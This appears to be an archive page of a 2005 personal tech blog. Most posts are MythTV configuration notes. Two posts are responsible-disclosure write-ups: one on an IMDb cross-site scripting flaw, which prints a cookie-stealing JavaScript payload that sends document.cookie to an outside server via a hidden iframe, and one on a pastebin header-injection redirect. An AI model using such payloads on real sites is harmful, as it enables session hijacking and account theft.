codeblog code is freedom — patching my itch

October 31, 2005

imdb xss

Filed under: Security,Vulnerabilities — kees @ 10:43 pm

Last week I discovered a cross-site scripting vulnerability in IMDb’s website. It was a strong enough vulnerability that I could actively steal login sessions with it. Part of their Search system would pass the “to-be-displayed” location on the URL, and didn’t quote HTML entities. I was able to steal my own cookies and log in with my IMDb account from another computer. Last Wed, I reported it:

26 Oct 2005 10:29:59 PM
Hello!

It seems your service is vulnerable to cross-site scripting (XSS). Since you
have login information stored as cookies, it’s possible for people to trick
others into exposing their logins. As an example, this displays your cookies to
you in your browser:

http://imdb.com/List?locations=a&&heading=18;%3Cscript%3Ealert(document.cookie)%3C/script%3E

Please let me know if you have any questions. I love using IMDb, and thought
you might want to make yourselves more secure.

Thanks!

At 9am today, they had fixed it:

31 Oct 2005 09:01:17 AM
Thank you for your feedback about the Internet Movie Database.

The IMDb is constantly being updated and improved, and we welcome all comments and suggestions aimed at improving its features, flexibility and ease of use.

We appreciate that you took the time to share your thoughts with us. It has now been fixed.

Thank you for your support!

—-
Regards,
[name]
The IMDb Help Desk

Another success for vulnerability reporting!

As for a concrete example, the “heading” argument to their search tool was being displayed. The harmless example I used above just pops an alert dialog. To actually pass the cookies off-site where it can be collected, I used an invisible IFRAME, and pulled a content-less document from my server. To do this, I wanted the following to appear on the IMDb page:

<iframe src=”http://outflux.net/null.html?cookie” width=”0″ height=”0″ frameborder=”0″</iframe>

There are a number of ways to take the browser off-site. Another are the HTTP methods that get used in a lot of AJAX applications. I haven’t dug into using that, even though they’re way more powerful (since you don’t need to “hide” the results of an IFRAME, etc, if you don’t listen for the HTTP results, they just never get used — it’s only the “side-effect” of recording the cookie off-site that’s wanted). Since this XSS vulnerability lets me write JavaScript directly to the browser, I needed to inject the following:

document.write(‘<iframe src=”http://outflux.net/null.html?’+document.cookie+'” width=”0″ height=”0″ frameborder=”0″</iframe>’)

And here it is, HTML-encoded, stuffed into the middle of the “header” argument to the search function, disguised as a search for filming locations in Vancouver, BC:

http://imdb.com/List?endings=on&&locations=Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&&heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write(‘%3Ciframe%20src=%22http://outflux.net/null.html?’%2Bdocument.cookie%2B’%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C/iframe%3E’)%3C/script%3E%20Canada

And if you click that, you can see their newly fixed entity-escaping. Again, kudos to IMDb! Additionally, it looks like they rearranged their search tool to not even use the “header” argument anymore. Neato.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 28, 2005

gcc extensions

Filed under: General — kees @ 7:30 am

Robert Love wrote up a great summary of GCC extensions. Recommended reading! This is exactly the kind of summary I’ve been hoping to run into. Maybe I can go through Inkscape adding all sorts of fun tags to functions and variables now. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 27, 2005

pastebin rulez

Filed under: Security,Vulnerabilities — kees @ 7:40 am

When discussing code on IRC, I’ve found http://pastebin.com/ to be a valuable resource for sharing code snippets. It has a really simple interface, and can give you a semi-private area just by specifying a subdomain (e.g. http://yayoutflux.pastebin.com/).

I had spent some time yesterday doing some other security audits, and figured I’d poke around at pastebin. Overall, the system was fine (only two inputs: text and name — both were strongly filtered). I did discover a redirect bug, though, which would let me use the site to redirect to somewhere else. While there isn’t anything to “steal” on pastebin, a bad guy could still trick their unsuspecting friends into visiting other (maybe more dangerous?) websites.

I reported the problem to pastebin’s author (Paul Dixon), and he had it fixed before I woke up. That’s how vulnerability reporting is supposed to work! Thanks Paul!

Here’s how it used to work. From the pastebin help, you can type in a subdomain to use for your pastebin. (Like “yayoutflux” above.) The form did some checking (no /’s allowed), but would accidentally let you send whitespace, including a linefeed.

Normally, a web redirect from that form would look something like this, where the user input is shown in bold:

HTTP/1.1 302 Found
Location: http://yayoutflux.pastebin.com

However, if I add a linefeed (URL encoded as %0A: http://pastebin.com/pastebin.php?goprivate=cnn.com%0A), I could break the “Location” tag, and trick the browser into going somewhere else:

HTTP/1.1 302 Found
Location: http://cnn.com
.pastebin.com

Great illustration of redirection XSS.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 23, 2005

mythtv original air date visibility

Filed under: Multimedia — kees @ 3:12 pm

I have been really unhappy with MythTV’s visibility of program “Original Air Date” information, which as far as I could tell is only visible through the Program Finder. I wanted to be able to see original air date while I browsed my recordings. Digging through the MythTV code has proven very difficult. The documentation has been minimal, and I haven’t found any tutorials on theme creation, which seems to be where all the visible components of the mythfrontend get their details from.

While looking for the bleeding-edge code, I did find http://cvs.mythtv.org/ which is actually a Subversion repository, bug tracker, and wiki. There a nice start to information there, including doxygen output. Also, the #mythtv-users channel on freenode has a nice MythTV FAQ.

The bulk of the display stuff I was looking from takes place in programs/mythfrontend/playbackbox.cpp (thank Bryce). The “cursorDown” function led me through to the “update*” functions, and eventually ToMap/SetText calls, which load program information into a hash, and then pass that hash to the theme engine.

libs/libmythtv/programinfo.cpp has ToMap defined, and all the various hash keys are visible, including the original air date variable I was looking for:

progMap[“title”] = title;
progMap[“subtitle”] = subtitle;
progMap[“description”] = description;

progMap[“originalairdate”]= originalAirDate.toString(dateFormat);

SetText is in libs/libmyth/uitypes.cpp. Hash items are uppercased to match %-enclosed words from the themes. The first “|” seen is to identify “what appears in front”, and the second is “what’s after”.

I modified the ui.xml from my theme (G.A.N.T. currently) from:

  <value>%SUBTITLE|”|”
%%STARS%%DESCRIPTION%</value>

to:

  <value>%SUBTITLE|”|” %%ORIGINALAIRDATE|(|)
%%STARS%%DESCRIPTION%</value>

So now, when I scroll down to Smallville, I see in the description box:

“Aqua” (2005-10-20)
During a beach party Lois hits her head when she jumps into the lake, and …

Ta-da! Original Air Date in parens. Now, being able to see the year is important, so I had to change my date format to one that included the year, but it’s ugly. To fix this, I need to actually change code. In “MythDateFormat” from programs/mythfrontend/globalsettings.cpp, I added:

gc->addSelection(sampdate.toString(“ddd MMM d, yyyy”), “ddd MMM d, yyyy”);

Now I just have to get it compiled. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 19, 2005

color printer tracking

Filed under: Reverse Engineering,Security — kees @ 3:28 pm

I’m a little behind in my Slashdot reading, so apologies to those that saw this earlier.

The EFF cracked the nearly invisible finger-printing code produced by color printers. This system is used by most (if not all) major color printer manufacturers to report the serial number of the printer used and the date a page was printed. This system has been in place for at least 10 years. I’m horrified at this kind of privacy invasion. To quote the EFF:

“Underground democracy movements that produce political or religious pamphlets and flyers, like the Russian samizdat of the 1980s, will always need the anonymity of simple paper documents, but this technology makes it easier for governments to find dissenters,” said EFF Senior Staff Attorney Lee Tien. “Even worse, it shows how the government and private industry make backroom deals to weaken our privacy by compromising everyday equipment like printers. The logical next question is: what other deals have been or are being made to ensure that our technology rats on us?”

EFF press release: http://www.eff.org/news/archives/2005_10.php#004063
Washington Post coverage: http://www.washingtonpost.com/wp-dyn/content/article/2005/10/18/AR2005101801663.html
Slashdot: http://yro.slashdot.org/article.pl?sid=05/10/18/1210237&tid=158&tid=194

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 16, 2005

mythtv button sounds

Filed under: Multimedia — kees @ 11:51 am

Well, I’ve discovered that my “slow to respond” UI was entirely due to the lirc “repeat” settings. I’ve eliminated (“repeat=0”) the repeat settings for the Esc, Up, Down, Left, Right, Space, and Return buttons. I discovered this only after seeing that ircat was just as slow to respond. I’ve hacked together a “make noise” script (named “irnoise”) that runs along with mythfrontend:

#!/bin/bash
export SOUNDS=~mythtv/sounds

ircat mythtv | while read NAME; do
  case “$NAME” in
   Return|Space)
    SOUND=select.wav
    ;;
   *)
    SOUND=default.wav
    ;;
  esac
  #echo “$NAME: $SOUND”
  aplay -q “$SOUNDS”/”$SOUND”
done

This gives me my “boop” and “click” noises for all remote buttons. Yay! Since I couldn’t find the official TiVo noises, and I don’t feel like taking my TiVo apart right now, I just grabbed some noises I found online. From the “MiscWAVs.zip”, I used “THUD.WAV” and “BTN_DWN.WAV”:

sox src/THUD.WAV -t wav -c 1 -s -w -r 48000 default.wav resample
sox src/BTN_DWN.WAV -t wav -c 1 -s -w -r 48000 -v 2 select.wav resample
normalize-audio -m default.wav select.wav

Not a lot of complaints left with my MythTV installation. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

mythtv dpi

Filed under: Multimedia — kees @ 9:43 am

I accidentally fixed my “fonts are too small” problem. While reading the MythTV development notes, there was mention of everything being designed for a 100dpi screen resolution. As it turns out, my Xorg config was defaulting to 75dpi, so I forced it with the DisplaySize option. Since my video card uses 640×480 for it’s NTSC output, I had to modify the recommended settings to use:

DisplaySize 162 121 # 100 DPI @ 640×480

I was surprised to discover that this solved my font size issues. I had so totally given up on the font size problem I didn’t even list it was a problem in the prior MythTV blog entry. :) I was actually expecting fonts to get even smaller, but I guess this changes how font selection is done, and as a result, everything appears sane now. Neato!

Also yesterday, in the hopes of reducing the effects of the “crappy audio” problem, and allowing multiple programs to have the soundcard open, I figured out how to get ALSA working natively within MythTV. In the MythTV configurations, the sound device should be “ALSA:default” instead of “/dev/dsp”, and the mixer should be “default” instead of “/dev/mixer”. The start of this was gleaned from the link I mentioned earlier. Mixer settings were found through trial and error. Strangely, MythMusic had a separate playback configuration, so I had to change that to “ALSA:default” as well.

Now that ALSA is being used, the audio choppiness has not returned. I can still get desync’d A/V, but I think that’s entirely due to disk latency issues, or something like that. Usually when it happens, if I pause or restart playback, it goes away. Also, since multiple programs can open the ALSA device and play sounds at the same time (thank you ALSA dmix), I can start looking at how to add a tool to play “button press notification” sounds. I’ll initial probably use something like “ircat” piped to a reader just to get a proof-of-concept. Then I’ll find some hooks in mythfrontend to attach it to instead. Eventually, I was a themeable visual notification. I should probably join the dev list to make sure other folks aren’t already working on this.

I’ve also found mention of “show type priority bumping”, where “New Episode” can trigger a bump in the priority of a recording. This may be a good step towards recording new Stargates at high priority, but reruns at very low priority. In the priority adjusting tool, I can see the third row for this kind of priority bump, but I can’t find the UI elements to adjust it.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 15, 2005

mythtv OMG

Filed under: Multimedia — kees @ 9:25 am

I was preparing myself to deal with the “pain” of moving to a multimedia system that didn’t have all the feature tweaks I need. MythTV has surprised me in that after only a week, and I’ve solved almost all my issues through just finding the right configuration options.

As of about Tuesday (2 days after the initial “commitment”), I was ready to call it “better than my existing system”. It had a few glitches that bugged me, but overall, it had many many more features than I was expecting. After watching Smallville Thursday night, I’m a total freak for MythTV. Smallville was basically the first “Production” show MythTV recorded for me. I had recorded “Medium” earlier in the week, and that served as a good way to feel out the interface. Smallville is the real test because it’s at position 1 in my TiVo (and MythTV) recording priorities. I had no irritations while watching it. Nicely done, MythTV.

Rewind to Saturday. Bryce and I spent about 12 hours straight digging through KnoppMyth both on his new system and my machine that I brought over to his place. By the end of it, I had entirely reinstalled my system with Debian Sid, and installed the most current ivtv drivers, with the apt-able myth binaries. We had figured out how to get KnoppMyth running with the newer tuner chip, but Bryce’s HD audio card wasn’t supported in that version of the kernel. Let me just say, everyone should just start with the latest ivtv driver. It detected everything correctly right off the bat. On Sunday, Bryce installed Gentoo, and got the latest ivtv, etc, everything was happy.

Early this week I toyed with the remote control settings, and discovered a whole mess of MPlayer commands I didn’t know about that let you control playback speed (including fast audio!), OSD text (so I can have a visible indication that I’m paused), etc. After restoring my other MPlayer defaults (16M cache, readable font, etc), MPlayer stuff was in great shape again, including DVD playback. I also programmed my spare TiVo remote to control my stereo power and volume. I’m down to 1 remote finally! (I was surprised that the TiVo remote programming codes aren’t online anywhere. The only guide seems to be in the TiVo itself.)

Yesterday I discovered MythWeb. I must have been blind to miss it before. That’ll teach me not to read the entire EFF MythTV guide first. Full scheduling, guide data, recorded show lists, and most importantly, the ability to adjust the keybindings for the various MythTV modules. In the MythMusic module, I was infuriated that “PgDn” would skip to the next song, instead of (wait for it) paging down in the list of songs. I just can’t understand why such a massively counter-intuitive setting is the default.

The commercial detection system is greate so far. It’s already painful for me to go back to using my TiVo where I have to press the “skip 30 seconds” button ten times to get past all the commercials.

Current issues:

  • Interface is slow. Everything (especially the video browser) is slow to respond. I miss not having an audible notification that a remote button was received, but there should at least be SOME kind of visible change if a button is pressed.
  • Intermitant crappy audio playback. Something goofy happens on playback sometimes where the audio is just totally trashed. I just have to quit the playback and try again. I wonder if switching everything to using ALSA would make things better.
  • No way to record the same show with two priorities. I want to have “New Episodes Only” for “Stargate: SG-1” at a high priority, but “Any time, any channel” for it at a very low priority. I haven’t figured out how to do this yet. I think I will have to write special recording rules for it in SQL somewhere secret.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 6, 2005

freaky screen locking

Filed under: General — kees @ 8:54 pm

This afternoon, for no reason at all, I was annoyed that my music didn’t pause when I locked my screen. So I fixed that. Tonight, I checked my RSS feeds and discovered that Corey did exactly the same thing today.

I think that’s really freaky. Inter-city Open Source Mind-Meld. Only I did mine with xscreensaver and xmms:

#!/bin/bash
xmms –pause
xscreensaver-command lock

What I want now is a way to get xmms to unpause after I unlock my screen. :) I thought of a horrible hack for xscreensaver to do this, but I’m hoping there’s some other way.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

Powered by WordPress